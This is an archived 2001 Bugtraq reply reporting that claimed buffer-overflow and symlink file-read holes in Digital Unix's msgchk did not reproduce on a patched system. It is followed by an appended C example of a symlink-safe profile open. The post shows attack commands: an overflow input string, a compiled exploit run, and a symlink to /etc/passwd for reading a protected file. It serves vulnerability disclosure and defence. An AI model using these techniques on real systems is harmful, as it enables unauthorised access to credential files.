OSEC

From: Boyce, Nick (nick.boyceeds.com)
Date: Wed Sep 12 2001 - 04:54:41 CDT


    [Resend: my original reply to Bugtraq on Monday 10th has not appeared, and
    I haven't seen any other followup; this time I've replaced all weird >
    ASCII 127 characters in my screen dumps by X's in case that prevented my
    email's handling by some MTA somewhere]

    On 10 September 2001 03:54, SeungHyun Seo said :

    > there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital
    > unix 4.0x. it's a mail utility - check for messages (only available within
    > the message handling system, mh)
    [...]
    > /usr/bin/mh/msgchk is affected by a buffer overflow vulnerability
    >
    > -- snip --
    > $ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'`
    > AAAAAAAAAAAAA ... ...
    > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA :
    > msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ...
    > AAAAAAAAAAAAAAAAAAAAAAA
    > Memory fault(coredump)
    > -- snip --

    NOT confirmed. On my system (Digital Unix 4.0D, Patch Kit 5) this gives me:

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
    AAAAAAAAAAAAAA :
       msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    followed by another command prompt.

    And the exploit doesn't work:

    /usr/users/joesoap/bin>cc msgbreak.c -o msgbreak -std
    /usr/users/joesoap/bin>msgbreak
    I'm going to create the standard MH path for you.
    AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
     .... [lots of pairs of "G" followed by "y" with an upsilon accent]
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
     .... [even more A's]
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XX :
       msgchk: no such user as AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    /usr/users/joesoap/bin>whoami
    joesoap
    /usr/users/joesoap/bin>uname -a
    OSF1 mybox V4.0 878 alpha

    (Lines wrapped for readability, and unprintable blobs replaced by X's.)

    Looks like there must have been a patch for this somewhere in Patch Kits 1
    thru 5.
    Or maybe the hole only exists *prior* to 4.0D.

    Part 2:

    > Next, /usr/bin/mh/msgchk has a vulnerability where anyone can read 1 line
    > of the unprivileged file on the system. It's an old bug on redhat linux 2.0,
    > but it also works on digital unix 4.0x

    This hole doesn't work either:

    /usr/users/joesoap>ln -sf /etc/passwd ./~mh_profile
    /usr/users/joesoap>/usr/bin/mh/msgchk
    joesoap :
       No file-source mail waiting; last read on Wed, 27 Sep 2000 17:48:21 BST

    /usr/users/joesoap>head -2 ./~mh_profile
    root:xxxxxxxxxxxxx:0:1:system PRIVILEGED account:/:/bin/csh
    nobody:*Nologin:65534:65534:anonymous NFS user:/:

    Nick Boyce
    EDS, Bristol, UK
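As an added example (not code from this thread, nor from MH itself), here is the defensive file-open check that defeats the "Part 2" trick above: the per-user profile is opened with O_NOFOLLOW and accepted only if it is a regular file owned by the invoking user, so a planted symlink to /etc/passwd is never read. The function names open_user_profile and demo are hypothetical, and a POSIX system is assumed.

```c
/* Added example, not code from the thread or from MH: a safe way for a
 * privileged mail utility to open a per-user profile (like ~/.mh_profile)
 * without following a symlink the user planted at an unreadable file.
 * Function names are hypothetical; assumes POSIX with O_NOFOLLOW. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open `path` read-only only if it is NOT a symlink, is a regular file,
 * and is owned by the real (invoking) user. Returns an fd, or -1. */
int open_user_profile(const char *path, uid_t real_uid)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NOCTTY);
    if (fd < 0) return -1;      /* on Linux a symlink fails here with ELOOP */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != real_uid) {
        close(fd);              /* wrong type or wrong owner: refuse it */
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Self-check: in a scratch directory, create a genuine profile and a
 * symlink mimicking `ln -sf /etc/passwd ./.mh_profile`; the check must
 * accept the first and reject the second. Returns 1 on success. */
int demo(void)
{
    char dir[] = "/tmp/mhprof.XXXXXX";   /* constructed scratch location */
    char real[64], link[64];
    if (mkdtemp(dir) == NULL) return 0;
    snprintf(real, sizeof real, "%s/profile", dir);
    snprintf(link, sizeof link, "%s/link_profile", dir);
    FILE *f = fopen(real, "w");
    if (f == NULL || fputs("Path: Mail\n", f) == EOF || fclose(f) != 0) return 0;
    if (symlink("/etc/passwd", link) != 0) return 0;
    int fd_real = open_user_profile(real, getuid());
    int fd_link = open_user_profile(link, getuid());
    int ok = (fd_real >= 0) && (fd_link < 0);
    if (fd_real >= 0) close(fd_real);
    unlink(link); unlink(real); rmdir(dir);
    return ok;
}
```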